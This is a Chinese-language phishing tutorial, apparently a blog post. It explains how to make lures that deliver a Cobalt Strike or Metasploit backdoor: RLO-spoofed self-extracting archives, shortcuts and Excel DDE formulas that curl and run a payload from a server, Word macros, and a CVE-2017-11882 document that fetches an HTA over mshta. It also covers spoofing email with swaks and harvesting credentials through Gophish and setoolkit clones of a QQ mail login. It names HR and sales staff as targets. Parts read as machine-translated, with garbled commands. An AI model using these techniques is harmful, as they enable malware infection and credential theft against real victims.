一文就学会网络钓鱼“骚”姿势

## 1. 什么是网络钓鱼？

网络钓鱼是一种攻击，通过冒充银行或其他信誉良好的机构向他人发送垃圾邮件，目的是诱骗收件人泄露用户名、密码、帐户ID、ATM PIN 或信用卡详细信息等敏感信息。

## 2. 网络钓鱼的基本流程

钓鱼一般分为三个步骤：找大鱼、做饵、抛竿

寻找大鱼：我们的目标一般包括：HR、销售、文员等安全意识薄弱的人员，以及运维、开发等拥有重要资源的人员。

制作鱼饵：优质的鱼饵一般分为两部分。一是邮件内容更加真实可信，二是邮件附件尽可能伪装得正常。

抛竿：最后把鱼竿抛出去后，就可以等待鱼儿上钩了。

## 3.如何制作优质鱼饵

###0x01.自解压+RLO

制作思路：利用自解压文件的特性，解压后自动执行解压后的文件，达到上线的目的。由于自解压文件的后缀是exe，很容易被识破，所以我们还需要使用RLO后缀反转来进行一些伪装。

第一步：使用cs生成windows后门

第二步：准备任意图片，使用WinRAR将后门和图片一起自解压

压缩文件时，需要在高级——自解压选项中进行一些设置，使木马的执行更加隐蔽：

常规——解压路径：C:\\windows\\temp

设置——解压运行：C:\\windows\\temp\\artifact.exe

C:\\windows\\temp\\wallpaper.jpg

模式—— 全部隐藏

更新—— 更新模式—— 解压缩并更新文件

更新—— 覆盖模式—— 覆盖所有文件

第三步：使用resourcehacker更改文件图标，伪装成图片

第四步：将文件重命名为wallpaper gpj.exe，然后使用RLO反转后缀。最终效果如下

结合电子邮件钓鱼等方式向他人发送“图片”，引诱他人上钩

对方双击“图片”后，会同时执行artifact.exe和wallpaper.jpg，cs 上线。

###0x02.快捷方式

制作思路：运行快捷方式时，执行命令让它下载我们提前放置在服务器上的后门程序并运行

第一步：在cs中生成后门，放置在服务器网站目录中

步骤2：创建快捷方式并在目标中写入以下代码

````

C:\\Windows\\System32\\cmd.exe /kcurl http://xxx.xxx.xxx.xxx/exe/artifact.exe --output C:\\Windows\\temp\\win.exe C:\\Windows\\temp\\win.exe

``

步骤3：更改图标以增加其真实性

当对方双击快捷键时，就会下载并执行我们准备的artifact.exe

###0x03.Word宏病毒

宏病毒是嵌入在Word 中的带有恶意行为的宏代码（VBA 代码）。当我们双击打开含有宏病毒的word文档时，其宏代码就会自动运行。

第一步：使用cs生成恶意vba代码

第二步：新建doc文档，创建宏，保存

第三步：再次打开文件后，会提示是否启用宏。点击启用，cs 即可上线。

###0x04.Excel注入

Excel注入是一种将包含恶意命令的Excel公式插入到可导出为csv或xls等格式的文本中的方法。当用excel打开xls文件时，该文件会转换为excel格式，并提供excel公式的执行功能，从而引起命令执行。

####使用excel注入弹出计算器

注入代码：`=cmd| '/c 计算'！ '!A1'`

####使用excel注入在线cs

第一步：使用cs生成exe后门放到服务器上

第二步：替换恶意代码

````

=命令| '/c curl http://xxx.xxx.xxx.xxx/beacon.exe --输出C:\\Windows\\temp\\win.exe C:\\Windows\\temp\\win.exe' ! 'A1'

``

双击excel打开时，会执行恶意代码下载cs后门并运行，在线cs

###0x05.CVE-2017-11882

CVE-2017-11882漏洞也是一种文字钓鱼方式。它比宏病毒更加隐蔽。 Word伪装成某个通知文件，目标点击后可以直接上网。

使用CVE-2017-11882弹出计算器：

下载poc：https://github.com/Rider/CVE-2017-11882

生成带病毒的word文件

````

python2 Command109b_CVE-2017-11882.py -c \'cmd.exe /c calc.exe\' -o test.doc

``

双击test.doc，弹出计算器

使用cve-2017-11882上线msf

步骤1：使用exploit/windows/misc/hta_server生成病毒

````

使用exploit/windows/misc/hta_server

设置有效负载windows/meterpreter/reverse_http

设置端口4444

显示选项

剥削

``

第二步：生成含有病毒的doc文件，并将其伪装成通知文件

````

python2 Command109b_CVE-2017-11882.py -c \'mshta http://192.168.126.132:8080/Uf7DGFz.hta\' -o notification file.doc -i input.rtf

``

当受害者打开word时，msf会上线shell

## 4. 电子邮件伪造

**斯瓦克斯**

Swaks是kali自带的一个电子邮件伪造工具。通过swak，您可以将包含任何内容的电子邮件发送到任何目标。

````

swak 的用法：

--来自发件人的电子邮件地址

--ehlo 虚假电子邮件标头

--body 电子邮件正文内容

--header 邮件标题信息，subject 为邮件标题

--数据源电子邮件

--附加附件文件

````

发送电子邮件至指定的电子邮件地址

````

swaks --to [email protected] --来自A公司--ehlo 获奖须知--body 秉承“以诚信为人、精益求精”的企业核心价值观，立足发展，真正回馈社会和客户。全体员工祝贺您荣获本次活动一等奖。再次感谢您对我公司的信任和支持。这封信只是中奖的证明。具体细节请参见注释。 --header \'Subject: 获奖通知\'

``

如今，邮箱具有某种检测机制。如果你想让别人发邮件，这个方法就不是很有效。

**戈菲什**

Gophish是一个开源的钓鱼工具包，拥有自己的网页面板，给电子邮件编辑、网站克隆、数据可视化、批量发送等功能的使用带来了极大的便利。

伪造中奖通知邮件并发送附件

看起来效果不错。如果能保护文件不被杀掉就更好了。

第二种方法是将克隆的网站插入电子邮件正文中。

然后克隆一个QQ邮箱的登录页面，诱导其输入账号密码

如果对方提交账户密码，会显示在gophish

## 5. 网站克隆

###0x01，设置工具包

说到克隆网站，Kali自带的setoolkit为我们提供了很大的便利。它不仅可以记录用户提交的数据，还可以进行注入攻击。

### settoolkit 克隆网站

1.启动setoolkit，选择1，社会工程攻击

````

1）社会工程攻击【社会工程攻击（常用）】

2）渗透测试（快速通道）【渗透测试（快速通道）】

3) 第三方模块【第三方模块】

4) 更新社会工程工具包【更新社会工程工具包】

5) 更新SET配置【升级配置】

6) 帮助、制作人员和关于【帮助】

``

2.然后选择2、web网站攻击-钓鱼

````

1）鱼叉式网络钓鱼攻击媒介【鱼叉式网络钓鱼攻击】

2）网站攻击向量【Web网站攻击-钓鱼（常用）】

3) 传染性媒体生成器【传染性木马】

4) 创建Payload和Listener【创建Payload和Listener】

5) 群发邮件攻击【群发邮件攻击】

6）基于Arduino的攻击向量[基于Android的攻击]

7) 无线接入点攻击向量【wifi攻击】

8）QRCode Generator Attack Vector【生成QR码（只是普通QR码）】

9) Powershell攻击向量【Powershell攻击】

10) 第三方模块【第三方模块】

``

3.选项3，凭证攻击

````

1）Java Applet攻击方法【java Applet攻击】

2）Metasploit浏览器利用方法【Metasploit浏览器利用】

3）凭证收割机攻击方法【凭证攻击（常用）】

4) Tabnabbing攻击方法【Tababbing攻击】

5）Web劫持攻击方式【网页劫持】

6) Multi-Attack Web Method【web多重攻击】

7）HTA攻击方式【HTA攻击】

``

4.最后选择2、网站克隆

````

1) 网页模板【网页模板】

2) 网站克隆【克隆网站】

3) 定制进口【定制进口】

````